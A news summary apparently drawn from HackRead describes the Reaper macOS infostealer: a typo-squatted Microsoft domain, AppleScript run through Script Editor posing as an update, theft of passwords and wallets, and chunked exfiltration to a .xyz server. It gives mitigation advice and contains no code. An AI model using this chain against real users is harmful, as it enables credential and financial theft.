New Reaper Malware Uses Fake Microsoft Domain to Steal macOS Passwords
Cybersecurity

New Reaper Malware Uses Fake Microsoft Domain to Steal macOS Passwords

HackRead
HackReadMay 18, 2026

Companies Mentioned

SentinelOne

SentinelOne

S

Apple

Apple

AAPL

Miro

Miro

Microsoft

Microsoft

MSFT

Why It Matters

Reaper demonstrates that macOS, long considered a lower‑risk platform, is now a prime target for sophisticated credential‑theft and ransomware‑style operations, forcing enterprises to reassess their Mac security posture. The ability to bypass Apple’s latest patch and maintain persistence raises the stakes for both individual users and corporate IT teams.

Key Takeaways

  • Reaper uses typo‑squatted domain mlcrosoft.co.com for fake downloads
  • Malware tricks Script Editor to run AppleScript commands masquerading as updates
  • Steals passwords, browser data, 1Password, MetaMask, and financial files
  • Splits large files into 70 MB chunks before exfiltration to .xyz server
  • Bypasses macOS Tahoe 26.4 fix, installs persistent backdoor for later attacks

Pulse Analysis

The Reaper variant of the SHub infostealer marks a notable escalation in macOS‑focused threats. By exploiting a typo‑squatted domain that mimics popular productivity tools, attackers lure victims into clicking a specially crafted link that opens the native Script Editor. The embedded AppleScript runs silently, presenting a counterfeit Apple security update that convinces users to grant elevated privileges. This social‑engineering chain—combining domain spoofing, legitimate system utilities, and deceptive UI—allows the malware to bypass Apple’s recent macOS Tahoe 26.4 defenses, which were designed to block similar download‑based attacks.

Beyond the initial credential grab, Reaper’s capabilities extend to comprehensive data exfiltration. It harvests saved passwords from major browsers, extracts vaults from password managers like 1Password, and siphons private keys from cryptocurrency wallets such as MetaMask. The malware also scans for high‑value documents, compresses them, and uploads the data in 70 MB chunks to a concealed .xyz command‑and‑control server. A built‑in backdoor ensures continued access, enabling threat actors to pivot to additional payloads or maintain persistence for future campaigns. For enterprises with mixed‑OS environments, the ability to steal both corporate credentials and financial assets from a single Mac endpoint amplifies the potential impact.

Mitigation requires a layered approach. Users should verify download sources, avoid clicking unsolicited Script Editor links, and keep macOS and all applications patched promptly. Security teams can deploy endpoint detection solutions that monitor for anomalous AppleScript execution and unexpected curl activity. Additionally, enforcing multi‑factor authentication for privileged accounts limits the damage of stolen passwords. As attackers continue to refine macOS‑specific toolchains, organizations must treat Macs with the same rigor as Windows devices to safeguard sensitive data and maintain overall cyber resilience.

New Reaper Malware Uses Fake Microsoft Domain to Steal macOS Passwords

Read Original Article

Comments

Want to join the conversation?

Loading comments...